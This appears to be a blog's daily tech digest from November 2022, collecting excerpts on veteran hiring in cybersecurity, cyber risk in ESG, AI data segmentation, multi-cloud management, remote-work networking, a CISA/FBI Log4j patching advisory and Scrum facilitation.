Daily Tech Digest - November 17, 2022

Why Cybersecurity Should Highlight Veteran-Hiring Programs

Veterans who did not work in cybersecurity while in the military still have valuable skills that they bring to the field, however. The military emphasizes teamwork, adaptability, and responsibility, all traits that security professionals need to have. Military personnel are also trained in careful decision-making under extreme pressure using the available information. ... Earlier this year, the White House National Cyber Workforce and Education Summit issued a call to action to increase cybersecurity education and training opportunities. One of the announcements was to encourage more apprenticeship programs to help develop and train the cybersecurity workforce. In the months since, there have been a number of initiatives from cybersecurity organizations, including the SANS Institute. Many colleges and universities have specific training programs to give veterans hands-on experience in various areas. Cybersecurity training platform Cybrary said this week it is partnering with VetSec, a community of over 3,300 veterans working in or transitioning into cybersecurity, and TechVets, a bridge service for moving veterans, service leavers, reservists, and their families into IT careers.


ESG and C: Does Cybersecurity Deserve Its Own Pillar in ESG Frameworks?

Thefts of personal information during a cybersecurity breach erode trust on the part of customers investors, employees and other stakeholders, demonstrating the link between cyber risk and social risk. The new disclosure and reporting requirements embedded in the Security and Exchange Commission’s latest regulations governing the oversight of cybersecurity underline the link between governance risk and cyber risk. All this evidence shows that either cybersecurity is already part of ESG, and, perhaps, a more appropriate abbreviation should be ESGC. Most enterprise risk management policies have already expanded their oversight from purely financial risk to these other areas, including cybersecurity. Cyber risk can be as harmful to a company’s reputation and value as any other ESG issue, and the damage is inflicted and experienced in much the same way. As cyberattacks increase in size and frequency, the direct and indirect damage to companies — including loss of customer confidence, reputational damage, potential impact on the stock price and possible regulatory actions or litigation — arguably touches all aspects of ESG.


Efficient data governance with AI segmentation

An effective and efficient technology is available to replace such archaic methods and reduce risk fast, at a fraction of the cost: artificial intelligence (AI) segmentation. With AI-based segmentation, we ascertain what attributes of a file point to it being more likely to contain sensitive data after scanning just a small statistical sample of files. This provides us with important information to prioritize our search for high-risk data. For example, are Word documents at a higher risk than PowerPoint presentations? Is there a particular folder that is more likely to contain sensitive data? Once we have our riskiest data highlighted, we can immediately start a full scan and remediation process, eliminating the highest risk as early in the process as possible. Thus, we have prioritized the remediation process to achieve the greatest risk reduction in the least amount of time. For example, suppose we have many terabytes of data broken up into chunks of 100 terabytes. To index or scan 100 terabytes at a time could require several months of work, and it takes even longer to go through all of it.


What Makes a Good Cybersecurity Professional?

A cybersecurity professional is, at their core, an analytical person who looks at a problem from multiple points of view and devises an approach to solve the problem. When doing so, they must collaborate with people from different backgrounds and functions to understand the problem in depth and in context. This requires good communication skills, unlike some other technology-heavy roles in which a specification (spec) is provided and the task is strictly to achieve the spec. Someone could be an analyst, a risk advisor, a banker or a human resources (HR) professional and they could still be considered a cybersecurity professional. Cybersecurity relies on an understanding of human behavior and on contextual transactions in different lines of business. For example, a banker knows the pitfalls of processes when it comes to banking-related operations. They can bring this wealth of knowledge to cybersecurity operations by gaining the right skill set to build their technological capability. Imagine this to be a role where a consultant envisions the strategy and the solution and builds the technological stack required to solve the problem.


Agility, business more important than cost, network management for IT teams

Half of IT teams rated end-to-end visibility as a top priority, while just under that number said multicloud software-defined networks (SDNs) were on their most-wanted list. The bottom line in this area, said Cisco, was that although an unpredictable world challenges IT organisations, it also presents new opportunities for those that use technology to support dynamic business needs. It said IT needs to adopt an agile, cloud-like operations model for everything it does, including network operations. Cisco also remarked that as endpoints and applications become more dispersed and distributed, network complexity multiplies. While adoption of public cloud is growing, 50% of workloads are still deployed on-premise, and as a result, most environments will continue to be a mix of public cloud, hosted, private cloud, edge and on-premise environments, it said. CloudOps and NetOps figured highly in both operational and organisational trends and there was greater alignment between the objectives of both. In all, 49% of CloudOps and 42% of NetOps respondents said security was their top motivation for using multiple clouds, and both said business performance, security and agility were top priorities.


Networking for remote work puts the emphasis on people, not sites

Many companies had to support work-from-home (WFH) during COVID, and most looked forward to having their staff back in the office. Most now tell me that some or all of the staff isn’t coming back, and that remote work is a given for at least some positions, likely for a very long time. That’s opened major questions about how these now-forever-roaming workers are connected to information resources and to each other. Didn’t we solve this already, with Zoom and Teams? Sort of. Collaborative video applications provide a reasonable substitute for meetings, but you still have the challenge of application access and information delivery. A bit over 80% of enterprises I’ve talked with say they need to make a remote worker look like they’re at their desk, and they need to be able to work as though they were as well. During lockdown, most companies said they relied on sending files and documents to workers. A few used SD-WAN technology to connect workers’ homes to the company VPN. The former strategy is very limiting and inefficient; you can’t replace checking account status online by sending around documents.


5 ways to find hidden IT talent inside your organization

Nobody knows the hidden IT talents of non-IT employees better than their managers and co-workers. At TruStone, business leaders and managers are open to recognizing employees with IT potential that could benefit both the employee’s career and the company. “We’re transparent that this would be a great person for [an IT] career progression, so maybe they should come into IT,” Jeter says. Jeter often discovers talent through his team’s product management consults inside the organization. “With a lot of scaled agile framework, we have product owners that sit outside of IT but within the business in areas like consumer lending, member services, or mortgages. We have technologies to align with them and they orchestrate the backlog” and other supporting duties, Jeter says. “They see what IT does, and we see what they do — and some of them want to come into IT.” IT scored a new team member recently after a product owner in operations worked with IT on a product management consult. He had been with the company for nine years and worked in training before business operations.


Not patched Log4j yet? Assume attackers are in your network, say CISA and FBI

The ubiquitous nature of Apache Log4j means it's embedded in a vast array of applications, services and enterprise software tools that are written in Java and used by organizations around the world, many of which rushed to apply the fixes. But despite the urgent messaging around the need to apply critical security updates, there are still organizations that haven't done so – meaning they're still vulnerable to any cyber criminals or other malicious hackers looking to exploit Log4j. Now CISA and the FBI have warned organizations with affected VMware systems that didn't immediately apply patches or workarounds "to assume compromise and initiate threat hunting activities". The cybersecurity advisory (CSA) also warns any organizations that detect a compromise as a result of Log4j to "assume lateral movement" by the attackers, investigate any connected systems and audit accounts with high privilege access. "All organizations, regardless of identified evidence of compromise, should apply the recommendations in the mitigations section of this CSA to protect against similar malicious cyber activity," said the alert.


Don’t get lost in the cloud: How to manage multiple providers

For organizations that take an ad hoc approach to multi-cloud, the risks include cost overruns from engaging several different services, Linthicum warns. “They don’t have a good handle on how the money’s being spent in a particular cloud provider, even within the primary provider,” he says. “And they’re getting huge cloud bills they didn’t expect, to the point that the boards of directors and CIOs and C-suites are starting to notice.” Security concerns are another reason to centralize cloud management. Organizations with three or four providers should have a security system that spans all of them so they can avoid juggling several separate dashboards, Linthicum suggests. “That’s where people get confused, and that’s how breaches occur.” Besides a plan for how the various providers work together, Linthicum says, it’s crucial to have a financial operations (FinOps) program that monitors and manages usage and costs. “Many enterprises don’t have that right now,” he notes. “They wait for their bill to show up and then figure out what went on, and they’re just running it on a spreadsheet where they’re not getting a true FinOps program in place.”


When, Why and How Facilitation Skills Help Scrum Teams

Stress levels run high when two vocal members in the team, Minal and Linda, clash during the Sprint Retrospective. Minal expresses her disappointment with how little progress the team made during the Sprint. She adds sarcastically that maybe it was because of how they decided to implement the work, which was originally Linda’s idea. Linda responds quickly in a defensive tone, and calls out that Minal is always quick to point out what’s wrong but doesn’t contribute many suggestions of her own. The Retrospective delves into a tense back and forth between them and the Scrum Master who is facilitating the Retrospective, firmly stops their argument. The Scrum Master moves the discussion to improvement ideas for the team, and many items around managing work in progress and exploring new technologies are suggested, but ultimately the team is stuck at an impasse of what to carry forward. The timebox ends and the Scrum Master calls an end to the Sprint Retrospective with no plans for the team on how to improve.



Quote for the day:

"Make heroes out of the employees who personify what you want to see in the organization." -- Anita Roddick

No comments:

Post a Comment